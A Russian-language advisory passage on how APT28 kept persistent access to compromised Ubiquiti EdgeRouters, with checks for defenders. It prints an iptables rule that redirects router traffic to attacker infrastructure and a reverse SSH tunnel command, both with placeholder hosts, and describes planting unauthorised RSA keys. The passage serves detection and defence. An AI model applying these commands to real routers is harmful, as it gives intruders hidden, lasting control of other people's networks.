Прокси и туннель. Неофициальные функции Ubiquiti Прокси-сервер и туннельная инфраструктура APT28 использовали скомпрометированные Ubiquiti EdgeRouters для установления прокси-соединений и SSH-туннелей к подконтрольной инфраструктуре для поддержания постоянного доступа и контроля над скомпрометированными устройствами даже после смены пароля или других попыток взлома. Reverse proxy-подключения Были использованы правила iptables в EdgeRouters для установления подключений, например: iptables -t nat -I PREROUTING -d <router IP address> -p tcp -m tcp --dport 4443 -j DNAT -to-destination <APT28 dedicated infrastructure>:10081 Это правило iptables перенаправляет входящий трафик через порт 4443 EdgeRouter в выделенную инфраструктуру на порту 10081. Reverse SSH-туннели Кроме того, APT28 загрузили контролируемые SSH-RSA-ключи на скомпрометированные EdgeRouters для создания SSH-туннелей. Эти туннели позволяют получать доступ к скомпрометированным устройствам даже после смены пароля или других попыток взлома. Следующие каталоги необходимо просмотреть на предмет неизвестных ключей RSA: /root/.ssh/ /home/<user>/.ssh/ Наличие неизвестных ключей RSA в этих каталогах может указывать на то, что их использовали для доступа к EdgeRouters в обход аутентификации по паролю. Кроме того, безопасники могут проверить журналы сетевого трафика на EdgeRouters для идентификации аномальные сеансы SSH: ssh –i <RSA key> -p <port> root@<router IP address> -R <router IP address>:<port> Эта команда устанавливает SSH-туннель от EdgeRouter к инфраструктуре, позволяя поддерживать удалённый доступ и контроль над скомпрометированным устройством.